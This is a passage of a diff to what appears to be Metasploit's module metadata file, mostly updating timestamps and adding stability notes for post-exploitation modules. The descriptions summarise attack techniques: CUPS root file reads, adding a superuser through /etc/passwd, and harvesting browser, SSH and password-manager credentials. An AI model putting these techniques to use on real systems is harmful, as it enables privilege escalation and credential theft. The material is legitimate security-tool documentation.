"description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.",
"description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.",
"references": [
"CVE-2012-5519",
"OSVDB-87635",
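Review bot: the `description` in this hunk states the module works on "Ubuntu Desktop <= 12.0.4", which looks like a typo for the Ubuntu release number 12.04; worth correcting in the module source so the generated metadata states the supported version accurately.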
@@ -207937,7 +210321,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/escalate/cups_root_file_read.rb",
"is_install_path": true,
"ref_name": "multi/escalate/cups_root_file_read",
@@ -207963,7 +210347,7 @@
"author": [
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.",
"description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.",
"references": [
"BID-54472",
"URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html",
@@ -207975,7 +210359,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/escalate/metasploit_pcaplog.rb",
"is_install_path": true,
"ref_name": "multi/escalate/metasploit_pcaplog",
@@ -208013,7 +210397,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/apple_ios_backup.rb",
"is_install_path": true,
"ref_name": "multi/gather/apple_ios_backup",
@@ -208050,7 +210434,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-02 15:55:24 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb",
"is_install_path": true,
"ref_name": "multi/gather/aws_ec2_instance_metadata",
@@ -208125,7 +210509,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/check_malware.rb",
"is_install_path": true,
"ref_name": "multi/gather/check_malware",
@@ -208162,7 +210546,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-15 07:19:46 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/chrome_cookies.rb",
"is_install_path": true,
"ref_name": "multi/gather/chrome_cookies",
@@ -208246,7 +210630,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/dbvis_enum.rb",
"is_install_path": true,
"ref_name": "multi/gather/dbvis_enum",
@@ -208283,7 +210667,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/dns_bruteforce.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_bruteforce",
@@ -208320,7 +210704,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/dns_reverse_lookup.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_reverse_lookup",
@@ -208357,7 +210741,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 19:38:43 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/dns_srv_lookup.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_srv_lookup",
@@ -208394,7 +210778,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-25 18:15:24 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/docker_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/docker_creds",
@@ -208431,7 +210815,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/multi/gather/enum_hexchat.rb",
"is_install_path": true,
"ref_name": "multi/gather/enum_hexchat",
@@ -208439,6 +210823,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell",
@@ -208468,7 +210861,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-16 13:56:50 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/multi/gather/enum_software_versions.rb",
"is_install_path": true,
"ref_name": "multi/gather/enum_software_versions",
@@ -208476,6 +210869,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter",
@@ -208495,7 +210897,7 @@
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.",
"description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.",
"references": [
],
@@ -208505,7 +210907,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/enum_vbox.rb",
"is_install_path": true,
"ref_name": "multi/gather/enum_vbox",
@@ -208590,7 +210992,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/fetchmailrc_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/fetchmailrc_creds",
@@ -208627,7 +211029,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/filezilla_client_cred.rb",
"is_install_path": true,
"ref_name": "multi/gather/filezilla_client_cred",
@@ -208664,7 +211066,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/find_vmx.rb",
"is_install_path": true,
"ref_name": "multi/gather/find_vmx",
@@ -208703,7 +211105,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/firefox_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/firefox_creds",
@@ -208731,7 +211133,7 @@
"Dhiru Kholia <dhiru@openwall.com>",
"Henry Hoggard"
],
"description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
"description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
"references": [
],
@@ -208741,7 +211143,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-12-05 08:46:56 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/gpg_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/gpg_creds",
@@ -208780,7 +211182,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-10-29 04:31:12 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/grub_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/grub_creds",
@@ -208817,7 +211219,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/irssi_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/irssi_creds",
@@ -208853,7 +211255,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/jboss_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/jboss_gather",
@@ -208889,7 +211291,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-12-27 12:32:26 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/jenkins_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/jenkins_gather",
@@ -208928,7 +211330,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-11-22 14:11:03 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/lastpass_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/lastpass_creds",
@@ -208965,7 +211367,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/maven_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/maven_creds",
@@ -209049,7 +211451,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-12-23 11:36:38 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/multi_command.rb",
"is_install_path": true,
"ref_name": "multi/gather/multi_command",
@@ -209085,7 +211487,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/netrc_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/netrc_creds",
@@ -209121,7 +211523,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/pgpass_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/pgpass_creds",
@@ -209159,7 +211561,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/pidgin_cred.rb",
"is_install_path": true,
"ref_name": "multi/gather/pidgin_cred",
@@ -209196,7 +211598,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/ping_sweep.rb",
"is_install_path": true,
"ref_name": "multi/gather/ping_sweep",
@@ -209223,7 +211625,7 @@
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.",
"description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.",
"references": [
],
@@ -209233,7 +211635,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-19 20:35:33 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/remmina_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/remmina_creds",
@@ -209270,7 +211672,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/resolve_hosts.rb",
"is_install_path": true,
"ref_name": "multi/gather/resolve_hosts",
@@ -209306,7 +211708,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/rsyncd_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/rsyncd_creds",
@@ -209343,7 +211745,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/rubygems_api_key.rb",
"is_install_path": true,
"ref_name": "multi/gather/rubygems_api_key",
@@ -209379,7 +211781,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-12-23 11:36:38 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/run_console_rc_file.rb",
"is_install_path": true,
"ref_name": "multi/gather/run_console_rc_file",
@@ -209416,7 +211818,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-05-15 09:38:15 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/multi/gather/saltstack_salt.rb",
"is_install_path": true,
"ref_name": "multi/gather/saltstack_salt",
@@ -209424,6 +211826,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell",
@@ -209453,7 +211864,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/skype_enum.rb",
"is_install_path": true,
"ref_name": "multi/gather/skype_enum",
@@ -209490,7 +211901,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/ssh_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/ssh_creds",
@@ -209527,7 +211938,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/thunderbird_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/thunderbird_creds",
@@ -209564,7 +211975,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/tomcat_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/tomcat_gather",
@@ -209592,7 +212003,7 @@
"zhangyoufu",
"justingist"
],
"description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n and downloads the backup and autobackup files. The files are then decrypted using\n a known encryption key, then attempted to be repaired by zip. Meterpreter must be\n used due to the large file sizes, which can be flaky on regular shells to read.\n Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n If the zip can be repaired, the db and its information will be extracted.",
"description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n and downloads the backup and autobackup files. The files are then decrypted using\n a known encryption key, then attempted to be repaired by zip. Meterpreter must be\n used due to the large file sizes, which can be flaky on regular shells to read.\n Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n If the zip can be repaired, the db and its information will be extracted.",
"references": [
"URL-https://github.com/zhangyoufu/unifi-backup-decrypt/",
"URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1",
@@ -209605,7 +212016,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-03-21 11:00:25 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb",
"is_install_path": true,
"ref_name": "multi/gather/ubiquiti_unifi_backup",
@@ -209641,7 +212052,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-05-04 11:31:11 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/multi/gather/unix_cached_ad_hashes.rb",
"is_install_path": true,
"ref_name": "multi/gather/unix_cached_ad_hashes",
@@ -209649,6 +212060,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter",
@@ -209678,7 +212098,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-05-04 11:34:22 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/multi/gather/unix_kerberos_tickets.rb",
"is_install_path": true,
"ref_name": "multi/gather/unix_kerberos_tickets",
@@ -209686,6 +212106,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter",
@@ -209715,7 +212144,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/gather/wlan_geolocate.rb",
"is_install_path": true,
"ref_name": "multi/gather/wlan_geolocate",
@@ -209752,7 +212181,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/general/close.rb",
"is_install_path": true,
"ref_name": "multi/general/close",
@@ -209789,7 +212218,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/general/execute.rb",
"is_install_path": true,
"ref_name": "multi/general/execute",
@@ -209826,7 +212255,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/general/wall.rb",
"is_install_path": true,
"ref_name": "multi/general/wall",
@@ -209864,7 +212293,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/autoroute.rb",
"is_install_path": true,
"ref_name": "multi/manage/autoroute",
@@ -209900,7 +212329,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/dbvis_add_db_admin.rb",
"is_install_path": true,
"ref_name": "multi/manage/dbvis_add_db_admin",
@@ -209936,7 +212365,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/dbvis_query.rb",
"is_install_path": true,
"ref_name": "multi/manage/dbvis_query",
@@ -210009,7 +212438,7 @@
"author": [
"Sheila A. Berta (UnaPibaGeek)"
],
"description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.",
"description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.",
"references": [
"URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html",
"URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf"
@@ -210020,7 +212449,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-03 02:18:30 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/hsts_eraser.rb",
"is_install_path": true,
"ref_name": "multi/manage/hsts_eraser",
@@ -210047,7 +212476,7 @@
"author": [
"carlos_perez <carlos_perez@darkoperator.com>"
],
"description": "This module will execute a list of modules given in a macro file in the format\n of <module> <opt=val,opt=val> against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.",
"description": "This module will execute a list of modules given in a macro file in the format\n of <module> <opt=val,opt=val> against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.",
"references": [
],
@@ -210057,7 +212486,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-12-23 11:36:38 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/multi_post.rb",
"is_install_path": true,
"ref_name": "multi/manage/multi_post",
@@ -210084,7 +212513,7 @@
"author": [
"Eliott Teissonniere"
],
"description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.",
"description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.",
"references": [
],
@@ -210094,7 +212523,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-21 16:46:15 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/open.rb",
"is_install_path": true,
"ref_name": "multi/manage/open",
@@ -210131,7 +212560,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/play_youtube.rb",
"is_install_path": true,
"ref_name": "multi/manage/play_youtube",
@@ -210173,7 +212602,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/record_mic.rb",
"is_install_path": true,
"ref_name": "multi/manage/record_mic",
@@ -210199,7 +212628,7 @@
"author": [
"Eliott Teissonniere"
],
"description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.",
"description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.",
"references": [
],
@@ -210209,7 +212638,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-21 16:46:00 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/screensaver.rb",
"is_install_path": true,
"ref_name": "multi/manage/screensaver",
@@ -210291,7 +212720,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/set_wallpaper.rb",
"is_install_path": true,
"ref_name": "multi/manage/set_wallpaper",
@@ -210327,7 +212756,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-05-27 10:21:59 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/shell_to_meterpreter.rb",
"is_install_path": true,
"ref_name": "multi/manage/shell_to_meterpreter",
@@ -210365,7 +212794,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-01-20 12:44:29 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/sudo.rb",
"is_install_path": true,
"ref_name": "multi/manage/sudo",
@@ -210401,7 +212830,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-22 13:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/system_session.rb",
"is_install_path": true,
"ref_name": "multi/manage/system_session",
@@ -210438,7 +212867,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-02 21:33:01 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/manage/upload_exec",
@@ -210475,7 +212904,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/manage/zip.rb",
"is_install_path": true,
"ref_name": "multi/manage/zip",
@@ -210503,7 +212932,7 @@
"sinn3r <sinn3r@metasploit.com>",
"Mo"
],
"description": "This module suggests local meterpreter exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.",
"description": "This module suggests local meterpreter exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.",
"references": [
],
@@ -210513,7 +212942,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-05-25 10:25:32 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/recon/local_exploit_suggester.rb",
"is_install_path": true,
"ref_name": "multi/recon/local_exploit_suggester",
@@ -210550,7 +212979,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/recon/multiport_egress_traffic.rb",
"is_install_path": true,
"ref_name": "multi/recon/multiport_egress_traffic",
@@ -210673,7 +213102,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/multi/sap/smdagent_get_properties.rb",
"is_install_path": true,
"ref_name": "multi/sap/smdagent_get_properties",
@@ -210681,6 +213110,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter",
@@ -210710,7 +213148,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/networking/gather/enum_brocade.rb",
"is_install_path": true,
"ref_name": "networking/gather/enum_brocade",
@@ -210746,7 +213184,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-05-13 04:01:03 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/networking/gather/enum_cisco.rb",
"is_install_path": true,
"ref_name": "networking/gather/enum_cisco",
@@ -210754,6 +213192,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell"
@@ -210782,7 +213229,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-24 20:24:57 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/networking/gather/enum_f5.rb",
"is_install_path": true,
"ref_name": "networking/gather/enum_f5",
@@ -210790,6 +213237,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
